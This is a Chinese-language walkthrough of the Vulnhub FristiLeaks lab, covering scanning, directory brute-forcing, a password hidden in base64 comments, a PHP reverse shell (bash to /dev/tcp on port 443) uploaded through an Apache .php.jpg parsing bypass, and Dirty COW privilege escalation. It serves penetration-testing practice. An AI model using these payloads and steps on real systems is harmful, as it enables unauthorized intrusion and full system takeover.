Vulnhub-FristiLeaks打靶

目录

一、nmap扫描/gobuster目录爆破

二、通过apache解析漏洞上传php反弹shell获得shell

三、脏牛提权


一、nmap扫描/gobuster目录爆破

nmap -sT --min-rate 10000 192.168.213.138 -oA nmapscan/port

扫描tcp开放了那些端口,保存到nmap/port中

nmap -sU --min-rate 10000 192.168.213.138 -oA nmapscan/port

扫描udp开放了那些端口,保存到nmap/udp中

nmap -sT -sC -Pn -v -sV -O 192.168.213.138 -oA nmapscan/detail

对开放的端口进行详细的探测,保存到detail中

nmap --script=vuln 192.168.213.138 nmapscan/vuln 

使用nmap的漏洞扫描脚本进行漏洞扫描

通过nmap扫描只知道开放了80端口,nmap枚举出的目录 /cola  /sisi   /beer 都是这个

进行目录爆破

使用gobuster进行常规的目录爆破,没有结果

gobuster dir -u http://192.168.213.138 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

使用gobuster对php,sql,txt,zip,rar文件进行爆破,也没有结果

gobuster dir -u http://192.168.213.138 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sql,txt,zip,rar,tar

发现靶机名称为fristi leaks    leaks翻译是泄露的意思,把fristi当作目录名试试

看到这种登录框先考虑有没有sql万能密码,弱密码,尝试过后发现并没有

F12发现两段注释

第一段知道了一个用户名:eezeepz

第二段看到最后的两个“==”,应该是base64,进行解码

发现是png图片

看到了图片的内容,因为只有80端口开放,有一个登录界面,知道了一个用户名,猜测这个可能为密码

eezeepz:keKkeKKeKKeKkEkkEk

登陆成功

二、通过apache解析漏洞上传php反弹shell获得shell

是一个上传的功能点

先写一个php的反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'");?> 

进行上传,只允许这几种图片格式

使用wappalyzer发现apache版本低,可能存在解析漏洞

把shella.php改名为shella.php.jpg

成功上传,nc开启监听,访问:http://192.168.213.138/fristi/uploads/shella.php.jpg

反弹shell成功

三、脏牛提权

uname -a     发现靶机内核为2.6.32

gcc也是有的,可以用脏牛进行提权

把exp下载到靶机

python -m http.server 7777

wget http://192.168.213.128:7777/40839.c

gcc进行编译

gcc -pthread -o exp 40839.c -lcrypt

su firefart

总结:通过靶机名发现fristi目录,f12发现注释,进行base64解码后知道了密码,登录后使用apache解析漏洞成功获取到shell,最后使用脏牛进行提权。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值